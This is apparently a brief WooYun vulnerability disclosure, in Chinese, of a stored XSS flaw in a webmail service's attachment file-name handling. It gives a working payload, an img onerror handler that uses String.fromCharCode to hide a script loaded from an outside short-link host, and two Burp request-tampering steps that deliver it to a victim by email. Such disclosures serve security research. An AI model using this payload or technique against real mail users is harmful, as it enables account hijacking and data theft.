WooYun.org

在邮件附件的上传文件时没有对文件名过滤，因为我的操作系统文件名不能带有“/”，而且长度不能太长，只好使用Burp来改包了，有点麻烦啊，需要把发包两次，
第一次是上传时把附件文件名改为<img src=1 onerror=(function(){window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,49,50,54,46,97,109,47,100,84,119,65,73,48);document.body.appendChild(window.s)})()>.html"
然后从包里找到ComposeId。
第二次发包，是抓一个发信的包，把ComposeId改为刚才修改的文件后的那个，然后发包即可将含有xss代码附件名字的邮件发送给受害者，当受害者打开邮件，就会触发xss。